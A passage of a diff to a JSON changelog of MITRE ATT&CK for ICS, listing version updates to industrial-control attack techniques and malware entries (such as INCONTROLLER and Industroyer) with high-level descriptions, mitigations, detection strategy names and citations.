+                            "DET0787: Detection of Remote System Information Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.715000+00:00",
+                    "name": "Screen Capture",
+                    "description": "Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. (Citation: ICS-CERT October 2017) Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "collection"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0852",
+                            "external_id": "T0852"
+                        },
+                        {
+                            "source_name": "ICS-CERT October 2017",
+                            "description": "ICS-CERT 2017, October 21 Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2017/10/23 ",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.715000+00:00\", \"old_value\": \"2025-10-24 17:49:21.744000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0816: Mitigation Limited or Not Effective"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0751: Detection of Screen Capture"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Theft of Operational Information",
+                    "description": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations.    In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impact"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0882",
+                            "external_id": "T0882"
+                        },
+                        {
+                            "source_name": "Danny Yadron December 2015",
+                            "description": "Danny Yadron 2015, December 20 Iranian Hackers Infiltrated New York Dam in 2013 Retrieved. 2019/11/07 ",
+                            "url": "https://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559"
+                        },
+                        {
+                            "source_name": "Mark Thompson March 2016",
+                            "description": "Mark Thompson 2016, March 24 Iranian Cyber Attack on New York Dam Shows Future of War Retrieved. 2019/11/07 ",
+                            "url": "https://time.com/4270728/iran-cyber-attack-dam-fbi/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2025-10-24 17:49:16.405000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0803: Data Loss Prevention",
+                            "M0809: Operational Information Confidentiality",
+                            "M0922: Restrict File and Directory Permissions",
+                            "M0941: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0732: Detection of Theft of Operational Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e17cdc00-8b58-4e5f-9d50-4cad1592c4c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:50:34.487000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Unauthorized Message",
+                    "description": "Adversaries may send unauthorized messages to ICS systems and devices to evade defenses or manipulate processes. Unauthorized messages can be categorized as either reporting messages that contain telemetry data about the current state of systems, devices, and processes or as command messages which instruct systems and devices on how to operate. By injecting unauthorized messages, adversaries can make it appear as if everything is working correctly when it isn\u2019t, trigger alarms to misdirect personnel or impact processes, and manipulate controls to disrupt processes.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nAdversaries may send unauthorized messages in an ICS environment using software found within the environment (living-off-the-land, vendor-specific interfaces, etc.), custom tooling leveraging OT protocols and libraries, or by positioning themselves between systems and devices and injecting messages into the communications such as the case with an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "evasion"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impair-process-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1692",
+                            "external_id": "T1692"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2026-04-23 18:54:29.294000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0802: Communication Authenticity",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0902: Detection of Unauthorized Message"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4344d1b8-968b-4697-9ab9-f9abe5f52265",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:17.053000+00:00",
+                    "modified": "2026-05-12 15:12:00.629000+00:00",
+                    "name": "Command Message",
+                    "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105).(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster.(Citation: Zack Whittaker April 2017)(Citation: Benjamin Freed March 2019)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "evasion"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impair-process-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1692/001",
+                            "external_id": "T1692.001"
+                        },
+                        {
+                            "source_name": "Benjamin Freed March 2019",
+                            "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ",
+                            "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        },
+                        {
+                            "source_name": "Zack Whittaker April 2017",
+                            "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ",
+                            "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.629000+00:00\", \"old_value\": \"2026-04-23 18:59:19.225000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0802: Communication Authenticity",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0818: Validate Program Inputs",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0794: Detection of Unauthorized Command Message"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--527106b3-95a2-4ed2-bf89-db7f0e4d0da0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:17.539000+00:00",
+                    "modified": "2026-05-12 15:12:00.633000+00:00",
+                    "name": "Reporting Message",
+                    "description": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values.\n\nIf an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "evasion"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "impair-process-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1692/002",
+                            "external_id": "T1692.002"
+                        },
+                        {
+                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
+                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
+                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.633000+00:00\", \"old_value\": \"2026-04-23 19:01:42.644000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0802: Communication Authenticity",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0746: Detection of Spoof Reporting Message"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Valid Accounts",
+                    "description": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. \n\nAdversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator)  and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0859",
+                            "external_id": "T0859"
+                        },
+                        {
+                            "source_name": "Booz Allen Hamilton",
+                            "description": "Booz Allen Hamilton. (2016). When The Lights Went Out. Retrieved December 18, 2024.",
+                            "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-04-15 19:59:08.866000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0801: Access Management",
+                            "M0913: Application Developer Guidance",
+                            "M0915: Active Directory Configuration",
+                            "M0918: User Account Management",
+                            "M0926: Privileged Account Management",
+                            "M0927: Password Policies",
+                            "M0932: Multi-factor Authentication",
+                            "M0936: Account Use Policies",
+                            "M0937: Filter Network Traffic",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0724: Detection of Valid Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                }
+            ],
+            "revocations": [],
+            "deprecations": [],
+            "deletions": []
+        },
+        "software": {
+            "additions": [],
+            "major_version_changes": [],
+            "minor_version_changes": [],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "malware",
+                    "id": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-28 20:07:40.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "INCONTROLLER",
+                    "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) is custom malware that includes multiple modules tailored towards ICS devices and technologies, including Schneider Electric and Omron PLCs as well as OPC UA, Modbus, and CODESYS protocols. [INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to discover specific devices, download logic on the devices, and exploit platform-specific vulnerabilities. As of September 2022, some security researchers assessed [INCONTROLLER](https://attack.mitre.org/software/S1045) was developed by CHERNOVITE.(Citation: CISA-AA22-103A)(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Schneider-Incontroller)(Citation: Wylie-22) ",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1045",
+                            "external_id": "S1045"
+                        },
+                        {
+                            "source_name": "PIPEDREAM",
+                            "description": "(Citation: Dragos-Pipedream)(Citation: Wylie-22)"
+                        },
+                        {
+                            "source_name": "CISA-AA22-103A",
+                            "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a"
+                        },
+                        {
+                            "source_name": "Dragos-Pipedream",
+                            "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite\u2019s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.",
+                            "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en"
+                        },
+                        {
+                            "source_name": "Wylie-22",
+                            "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.",
+                            "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf"
+                        },
+                        {
+                            "source_name": "Brubaker-Incontroller",
+                            "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.",
+                            "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool"
+                        },
+                        {
+                            "source_name": "Schneider-Incontroller",
+                            "description": "Schneider Electric. (2022, April 14). Schneider Electric Security Bulletin: \u201cAPT Cyber Tools Targeting ICS/SCADA Devices\u201d . Retrieved September 28, 2022.",
+                            "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SESB-2022-01"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "INCONTROLLER",
+                        "PIPEDREAM"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jimmy Wylie, Dragos, Inc."
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Engineering Workstation",
+                        "Field Controller/RTU/PLC/IED",
+                        "Safety Instrumented System/Protection Relay",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-23 14:06:34.251000+00:00\"}}}",
+                    "previous_version": "1.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-01-04 20:42:21.997000+00:00",
+                    "modified": "2026-05-12 15:12:00.739000+00:00",
+                    "name": "Industroyer",
+                    "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0604",
+                            "external_id": "S0604"
+                        },
+                        {
+                            "source_name": "CRASHOVERRIDE",
+                            "description": "(Citation: Dragos Crashoverride 2017)"
+                        },
+                        {
+                            "source_name": "Win32/Industroyer",
+                            "description": "(Citation: ESET Industroyer)"
+                        },
+                        {
+                            "source_name": "ESET Industroyer",
+                            "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.",
+                            "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf"
+                        },
+                        {
+                            "source_name": "Dragos Crashoverride 2017",
+                            "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.",
+                            "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf"
+                        },
+                        {
+                            "source_name": "Dragos Crashoverride 2018",
+                            "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.",
+                            "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "Industroyer",
+                        "CRASHOVERRIDE",
+                        "Win32/Industroyer"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Dragos Threat Intelligence",
+                        "Joe Slowik - Dragos"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.739000+00:00\", \"old_value\": \"2026-04-23 14:11:53.057000+00:00\"}}}",
+                    "previous_version": "1.2"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-04-16 19:00:49.435000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "LockerGoga",
+                    "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S0372",
+                            "external_id": "S0372"
+                        },
+                        {
+                            "source_name": "CarbonBlack LockerGoga 2019",
+                            "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification \u2013 LockerGoga Ransomware. Retrieved April 16, 2019.",
+                            "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/"
+                        },
+                        {
+                            "source_name": "Unit42 LockerGoga 2019",
+                            "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.",
+                            "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_aliases": [
+                        "LockerGoga"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Joe Slowik - Dragos"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.733000+00:00\", \"old_value\": \"2026-04-22 22:21:12.036000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "malware",
+                    "id": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-03-26 15:02:14.907000+00:00",
+                    "modified": "2026-05-12 15:12:00.733000+00:00",
+                    "name": "PLC-Blaster",
+                    "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them.  Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016) (Citation: Spenneberg, Ralf 2016) ",
+                    "revoked": false,
+                    "labels": [
+                        "malware"
+                    ],
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/software/S1006",
+                            "external_id": "S1006"
+                        },
+                        {
+                            "source_name": "Spenneberg, Ralf 2016",
+                            "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ",
+                            "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf"
+                        },
+                        {
+                            "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016",
